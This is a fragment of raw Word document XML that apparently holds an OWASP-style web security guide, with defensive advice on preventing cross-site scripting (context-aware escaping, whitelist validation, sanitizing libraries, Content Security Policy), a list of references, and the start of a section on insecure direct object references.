      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BE02B10" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E0B5E4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14AEC4B2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBCA47A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FE9E8E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D159D4F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11408C82" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745B2287" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674883EF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FA616E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1778B199" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C41FEFF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE029E4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B404F0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692E67B7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344DD357" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B16DC0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="374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XSS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC1A9E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Preven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X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par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ntrust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rom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6625FE41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acti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rows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tent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A98022A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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Th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referre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optio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o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roperly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escap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ll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ntrusted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497FD72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dat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as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TM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tex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(body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ttribute,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2BF61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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>JavaScript,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CSS,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or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URL)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a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data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will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b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place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nto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D4B23A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Se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X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Preven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he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hee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tails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C60136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scap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echniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F29398D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="26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2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Positi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“whitelist”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pu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alid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so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B91B441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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recommende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help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protec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gains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XSS,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bu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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="86"/>
          <w:sz w:val="19"/>
          <w:u w:val="single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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>not a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBD203F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comple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fen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n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pplicat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pecial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AC377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2"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>characters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in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their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input.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Such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validation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should,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as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="92"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="92"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>much</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27797703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a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ossible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alida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length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haracters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mat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</w:p>
    <w:p w14:paraId="79D76C34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busin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ul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fo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cep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put.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585EF6FB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="26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3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i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tent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sid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uto-sanitiz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librari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like</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E35F132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OWASP’s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AntiSam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4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Java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4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TM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4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anitiz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oject</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId251" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="323232"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0672E83B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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Consider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Conten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Security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Policy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(CSP)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o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defen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gainst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0143C37A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X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ro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you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ti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ite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAEE0F6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F8F558" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="410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73E8E3E1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</w:p>
    <w:p w14:paraId="487B2C0E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XS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even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3855FA51" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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OM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5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base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XS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even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5570B81C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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ross-Si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crip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</w:p>
    <w:p w14:paraId="6053FD56" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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SAPI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cod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PI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="112AAD0D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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6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SVS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utpu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coding/Escap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quirement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6)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D3D9946" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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ntiSamy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anitiz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Library</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F2DEC32" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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7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1s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3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ata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alid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</w:p>
    <w:p w14:paraId="0FCB04DF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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d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8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view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XS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view</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A869628" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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XS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il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vas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29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0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183B70BF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="310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3B611EBD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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W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Entr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79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ross-Si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0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cripting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17E4F9DA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4651D4B8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="10"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4C5A7D58" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="51CDDBBE">
          <v:shape id="_x0000_s2600" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:73.95pt;width:570pt;height:229.1pt;z-index:251656704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77E9C77C" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="1010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171B70E3" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="782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12C65FA0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5F4F4894" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="505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7FA02C3B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3ECDC4CD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="516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7703BF91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65D9085F" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="558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52231787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274A68EA" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="504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6CA7AECC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1E8A4A40" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="62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E96D828" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="430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5BEF56F6" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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07E812CE" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="6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6D2630D7" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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6D2C974C" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="47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COMM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62B52DBA" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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5BA820CB" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="69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5BFEFEFC" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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6088F152" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="42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09EC696" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="310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66351C44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6DF3DE65" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="2349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A4F4D9F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ypes</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0F619479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2D8992E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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="11D5F440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nly</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5807FB8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ti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4549B121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erta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yp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371D0A38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?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01DC7E7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</w:p>
                      <w:p w14:paraId="418AE6A6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oriz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</w:p>
                      <w:p w14:paraId="08BF405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mply</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2C149291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hang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2C477E4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amet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</w:p>
                      <w:p w14:paraId="4DC4F73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rec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fers</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="184D9988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bject</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7407BCF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oth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bject</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="67EA13C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n’t</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1A064384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oriz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7D58E096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ranted?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5ACDF30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equen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tual</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="63FB28A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am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bje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enerating</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="35535DF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n’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ways</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5A47C722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erif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oriz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rget</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0EAF425D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bject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sul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secu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rect</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7491A98C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bje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ferenc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st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sily</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="13224FCE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ipula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amet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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="265C53B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d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alys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quick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hows</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3F03C6E7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eth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oriz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per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erified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EF273B2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</w:p>
                      <w:p w14:paraId="064D3D19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romi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5C2D9BDB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</w:p>
                      <w:p w14:paraId="5CC10E1A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ferenc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7546EAB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ameter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less</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3CA73E34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bje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ferences</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="770A34EB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predictable,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5D9D0804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’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s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</w:p>
                      <w:p w14:paraId="6C4969F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</w:p>
                      <w:p w14:paraId="57738492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vailabl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05B1AC7C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ype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C32C38D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="274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1284BC09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092E6783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os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.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5445AF95" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="32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106DBA4D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a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5C90E746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ublic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osu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3E055753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ulnerability.</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="3FA7C154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6173EADA">
          <v:shape id="imagerId302" o:spid="_x0000_s2599" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:122pt;height:96pt;z-index:-251910656;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId302" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="37059D70">
          <v:shape id="imagerId303" o:spid="_x0000_s2598" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:83pt;width:76pt;height:37pt;z-index:-251909632;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId303" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6D75AF45">
          <v:shape id="imagerId304" o:spid="_x0000_s2597" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:101pt;margin-top:84pt;width:57pt;height:38pt;z-index:-251908608;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId304" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="56D1E53F">
          <v:shape id="imagerId305" o:spid="_x0000_s2596" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:222pt;margin-top:83pt;width:90pt;height:39pt;z-index:-251903488;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId305" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4D549367">
          <v:shape id="imagerId306" o:spid="_x0000_s2595" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:224pt;margin-top:85pt;width:80pt;height:38pt;z-index:-251902464;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId306" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="40A7B760">
          <v:shape id="imagerId307" o:spid="_x0000_s2594" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:373pt;margin-top:81pt;width:64pt;height:43pt;z-index:-251907584;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId307" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7D32B95C">
          <v:shape id="imagerId308" o:spid="_x0000_s2593" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:375pt;margin-top:87pt;width:59pt;height:38pt;z-index:-251906560;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId308" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1DFDF64F">
          <v:shape id="imagerId309" o:spid="_x0000_s2592" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:462pt;margin-top:83pt;width:69pt;height:39pt;z-index:-251905536;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId309" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="32DF0027">
          <v:shape id="imagerId310" o:spid="_x0000_s2591" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:470pt;margin-top:84pt;width:54pt;height:38pt;z-index:-251904512;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId310" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3015AEA3">
          <v:shapetype id="_x0000_m2590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AD96E38">
          <v:shape id="_x0000_s2589" type="#_x0000_m2590" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25192396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12662D5E">
          <v:shapetype id="_x0000_m2588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4E72C83">
          <v:shape id="_x0000_s2587" type="#_x0000_m2588" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:123.95pt;width:543pt;height:3pt;z-index:25165772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63A394B9">
          <v:shapetype id="_x0000_m2586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58D7638">
          <v:shape id="_x0000_s2585" type="#_x0000_m2586" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:155.15pt;width:543pt;height:3pt;z-index:25165875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6EFD033B">
          <v:shapetype id="_x0000_m2584" coordsize="600,20514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71D3CF">
          <v:shape id="_x0000_s2583" type="#_x0000_m2584" style="position:absolute;left:0;text-align:left;margin-left:538.5pt;margin-top:71.95pt;width:6pt;height:205.1pt;z-index:25165977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58D7A342">
          <v:shapetype id="_x0000_m2582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39F0CF1">
          <v:shape id="_x0000_s2581" type="#_x0000_m2582" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:73.45pt;width:543pt;height:3pt;z-index:25166080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67C05DF4">
          <v:shapetype id="_x0000_m2580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E142C4">
          <v:shape id="_x0000_s2579" type="#_x0000_m2580" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:272.6pt;width:543pt;height:3pt;z-index:25166182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1CB2CF9">
          <v:shapetype id="_x0000_m2578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A892924">
          <v:shape id="_x0000_s2577" type="#_x0000_m2578" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:7in;width:266.4pt;height:215pt;z-index:-25192294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AFC3E5E">
          <v:shapetype id="polygon144" o:spid="_x0000_m2576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9F17265">
          <v:shape id="WS_polygon144" o:spid="_x0000_s2575" type="#polygon144" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:282pt;width:266.4pt;height:3in;z-index:-25192192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EBE42CA">
          <v:shapetype id="polygon145" o:spid="_x0000_m2574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4151EC4">
          <v:shape id="WS_polygon145" o:spid="_x0000_s2573" type="#polygon145" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251920896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794A27CE">
          <v:shapetype id="polygon183" o:spid="_x0000_m2572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CE60B8A">
          <v:shape id="WS_polygon183" o:spid="_x0000_s2571" type="#polygon183" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-25191987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105570CC">
          <v:shapetype id="polygon195" o:spid="_x0000_m2570" coordsize="2246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8D4F669">
          <v:shape id="WS_polygon195" o:spid="_x0000_s2569" type="#polygon195" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:558.2pt;width:224.6pt;height:.6pt;z-index:-2519188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CFDEBBD">
          <v:shapetype id="polygon201" o:spid="_x0000_m2568" coordsize="1321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449AA73">
          <v:shape id="WS_polygon201" o:spid="_x0000_s2567" type="#polygon201" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:574.2pt;width:132.1pt;height:.55pt;z-index:-2519178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91CA9C2">
          <v:shapetype id="polygon207" o:spid="_x0000_m2566" coordsize="100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A96939">
          <v:shape id="WS_polygon207" o:spid="_x0000_s2565" type="#polygon207" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:590.15pt;width:100.3pt;height:.6pt;z-index:-2519168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D3658D7">
          <v:shapetype id="polygon216" o:spid="_x0000_m2564" coordsize="1701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8FB2598">
          <v:shape id="WS_polygon216" o:spid="_x0000_s2563" type="#polygon216" style="position:absolute;left:0;text-align:left;margin-left:280.8pt;margin-top:626.15pt;width:170.15pt;height:.6pt;z-index:-2519157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5DE0ADD">
          <v:shapetype id="polygon224" o:spid="_x0000_m2562" coordsize="2131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253A789">
          <v:shape id="WS_polygon224" o:spid="_x0000_s2561" type="#polygon224" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:674.15pt;width:213.1pt;height:.6pt;z-index:-25191475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E4F1827">
          <v:shapetype id="_x0000_m2560" coordsize="1279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5E3A82">
          <v:shape id="_x0000_s2559" type="#_x0000_m2560" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:690.2pt;width:127.9pt;height:.6pt;z-index:-25191372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8F73264">
          <v:shapetype id="polygon233" o:spid="_x0000_m2558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5503C3">
          <v:shape id="WS_polygon233" o:spid="_x0000_s2557" type="#polygon233" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:282pt;width:266.4pt;height:3in;z-index:-25191270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1E7E3D16">
          <v:shapetype id="_x0000_m2556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BFA4889">
          <v:shape id="_x0000_s2555" type="#_x0000_m2556" style="position:absolute;left:0;text-align:left;margin-left:272.6pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251911680;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#b3d6ac" strokeweight="2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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46878564" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
